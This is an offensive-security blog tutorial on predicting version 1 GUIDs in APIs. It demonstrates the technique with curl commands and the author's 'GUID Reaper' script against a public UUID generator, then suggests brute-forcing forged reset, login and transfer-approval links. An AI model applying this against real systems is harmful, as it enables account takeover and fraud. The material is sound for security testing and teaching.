Attacking predictable GUIDs when hacking APIs

If you spend any amount of time hacking APIs, you will come to notice that many endpoints use globally unique identifiers (GUIDs) to represent data in the system. While GUIDs are a great way to ensure data uniqueness, they can also be predictable.

In this article, I want to show you how to take advantage of predictable GUIDs to attack APIs. I’ve used this approach to extract protected data I was not supposed to have access to, and haved used this to complete account takeovers.

So let’s get down and dirty into the dark art of demonizing developers… and showcase how (mis)using GUID generation can lead to some interesting attacks on APIs.

A Hacker’s Primer to GUIDs

We got this…

So before we can get going, I need to clear something up…

GUID vs UUID

If you do this long enough, you will see the terms GUID and UUID used when referring to ids in APIs. Some people say they represent different things. Others say they are the same bloody thing.

So who is right?

The GUID designation is an industry standard defined by Microsoft to provide a reference number which is unique in any context. UUID is a term that stands for Universal Unique Identifier. Similarly, GUID stands for Globally Unique Identifier.

So basically, two terms for the same thing. In the API world, they are used interchangably. Spending decades in the Microsoft world, I call them GUIDs.

You call them whatever you like.

So what are GUIDs?

GUIDs are constructed in a sequence of digits equal to 128 bits. The ID is represented in hexadecimal characters, meaning it uses the numbers 0 through 9 and letters A through F. The hexadecimal digits are grouped as 32 hexadecimal characters with four hyphens: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX.

GUIDs are supposed to be unique, and random. And when used correctly, they can be. However, there is a common mistake developers make that breaks that and makes them predictable… leading to all sorts of problems that we can take advantage of on offense.

How GUIDs are predictable

In accordance with RFC 4122, GUIDs have a specific structure that we can potentially abuse to leak specific information about a target. This goes back to the world of backwards compatibility, and versioning.

You see, back when the original specification was published, the first version of UUID was time-based, and used artifacts of the system to generate unique values. These artifacts include:

The current time
A “clock sequence” that is randomly generated on boot up, but which remains constant between GUIDs
A “node ID“, which is generated based on the system’s MAC address

It looks something like this:

You can read up on the full generation details here.

So here is the thing. The version information is stored in the 13th character of the GUID. That’s the character right after the second hyphen/dash. So if the 13th charcter is a one (1), you know the API may be vulnerable to predictable GUIDs.

It’s actually possible to decode an existing v1 GUID and extract most of the necessary artifacts needed to generate our own list of GUIDs that the system would generate on its own. In other words, we can use this predictability to figure out what the target system would generate at any given time, providing us the opportunity to use that to our bidding.

Imagine a scenario where an online bank transfer requires an approval process. When a funds transfer is requested, the system generates a unique link that includes a new GUID and sends it to the approver. With a single click, it’s approved.

If we can capture a single GUID during our recon process, and can determine the API server’s time, we have everything we need to forge our own approval links to break the business logic, and allow us to approve our own malicious transfers.

Think that scenario isn’t feasible? What about the modern passwordless web application login systems that do this very thing? Or password reset functionality that follows securing coding recommendation of using unique URL links? There are plenty of real world scenarios you can attack in this way. You just need to look for places where v1 GUIDs are being used to represent a unique transaction.

OK, so now you have an idea of how to attack predictable GUIDs. Let’s go about practicing this against an actual API target to see this in action.

Attacking your first predictable GUID in an API

So cute… wanna pet??

We are of course not evil. So I am being a bit liberal when I say we are going to attack a real API. But stick with me here. Practicing this on an API published on the Internet will help you understand how this all works together.

So be nice.

The API in question is the UUID generator at https://uuid.openkm.com/api/version1. A GET request to that endpoint will always return a v1 GUID.

To help you with this predictability attack, I’ve published a gist on GitHub called guid_reaper.py. GUID Reaper is a python script based on guidtool I wrote that lets you quickly dump v1 GUIDs and generate your own set of predictable GUIDs for use against a target.

We will use GUID Reaper to decode a unique identifier that comes back from the API, and then use that to see if we can predict what one of the next GUIDs would be that the API would generate.

With me? Alright then… let’s go!

Step 1: Capture your first GUID from the API

We don’t need to get fancy here. Let’s simply use curl and bring back:

$ curl https://uuid.openkm.com/api/version1

Calling the API with curl

Step 2: Decode GUID with GUID Reaper

Now that we have the first GUID, run it through GUID Reaper to decode all the bits we will need:

$ ./guid_reaper -d 907886f0-50a4-11ed-8caf-00163e9b33ca

Decode a GUID with GUID Reaper

We definitely have a v1 GUID, and now have the Node ID, MAC address and Clock sequence from the target.

Step 3: Calculate time drift between attacker and victim systems

So we got almost everything we need to be able to forge our own predictable GUIDs. However, there is a small artifact that we need to still figure out. And that is what time does the API server think it is, and how does that compare with our own system?

Most API endpoints are running on a web server that will include the Date header. So we can usually get the timestamp of the server during our curl if we also pass the -i parameter to dump the response headers. I actually pass -is as I like to run curl in silent/quiet mode.

It ends up looking something like this:

$ curl -is https://uuid.openkm.com/api/version1

Call API and get response headers

If we were to decode that new GUID, we should see that the timestamp maps up with what the GUID holds:

 $ ./guid_reaper.py -d d5b0f250-50a6-11ed-8caf-00163e9b33ca

Decoding with GUID Reaper to compare dates

As you can see, the dates match up. But how does that compare to my own system?

We can simply dump a local timestamp when a request is finished and compare. To complete this, I will also throw in a printf call to add a newline after the curl command to ensure my date shows up on its own line. I’ll also use the -u option in date so it will return a UTC date so they are easier to compare.

It looks something like this:

$ curl -is https://uuid.openkm.com/api/version1; printf '\n'; date -u

More fun with curl and date

As you can see, there is about a 5 second drift between the API server’s time, and my own. We need to account for that whenever we generate GUIDs on our system for use against the API server.

Knowing that time drift will be important in the next step.

Step 4: Generate our own GUIDs with GUID Reaper

To generate our own GUIDs to use against an API, we simply have to pass GUID Reaper the date of an action that we want to predict the GUID for, along with a previously captured GUID from the target. You can do that with the -t parameter.

GUID Reaper already has a 2 second sliding window, which means when generating a set of GUIDs it will generate ids 2 seconds before and 2 seconds after the time we specify. But since I know there is a 5 second drift between systems, I want to account for that.

Here is an example of what it might look like:

			
./guid_reaper.py -t '2022-10-20 21:04:03' d5b0f250-50a6-11ed-8caf-00163e9b33ca > guidlist.txt

GUID Reaper takes the captured GUID passed in and calculated the precision of the id generation. Many systems have an affinity towards milliseconds, which means if you look at the timestamp of a dumped GUID it has 4 zeros at the end. This is helpful as it reduces the necessary candidate ids we need to generate. In the case of this API, it means with a 2 second sliding window to account for drift there will be 4,000 possible GUIDs to try. Of course, the higher level of precision required, the larger the candidate list.

Step 5: Bruteforce the API endpoint with the candidate list

So it’s kind of hard to do this step against this API. Normally you could use the text file generated as an input into Burp Intruder and fire off requests that rely on the GUID. As an example, if this was an attack against a password reset link, we could fire the GET request and construct the URL and query params accordingly.

Since we can’t really do that, what I want to do is simply demonstrate how to generate a list before I even query the API, and then grep for the GUID returned in my generated list to prove it worked.

The command looks something like this:

			
$ ./guid_reaper.py -t '2022-10-20 21:04:03' d5b0f250-50a6-11ed-8caf-00163e9b33ca > guidlist.txt ; head -n 1 guidlist.txt; tail -n 1 guidlist.txt; printf '\n'; curl -is https://uuid.openkm.com/api/version1

GUID Reaper #FTW

Notice the 3 GUIDs? The first two represent the first and last GUIDs generated by GUID Reaper. The last GUID is the one returned by the API. And when we grep through the guidlist.txt file… yep… it’s right there.

Score!

Now, to deal with the time drift, I used a novel concept. I know GUID Reaper has a 2 second sliding window, and that my system is 5 seconds off from the API server. So I ran this at exactly 2:04PM on my system, but set the time parameter to 2:04.03PM (21:04:03 GMT). This ensured that the candidates that were generated locally, and what was generated on the web server, were in the same time range.

TIP: If you don’t want to do this sort of math for time drift in your head, just sync up your local clock to match that of the server before the attack.

Conclusion

So there you have it. If you ever find a target API that is using v1 GUIDs in an endpoint, and that endpoint is relying on the GUID as part of its business logic, you have an opportunity to predict it, and pwn it.

You can get really creative with this. I will leave it to your mind’s eye to think about and see all the possibilities. 😈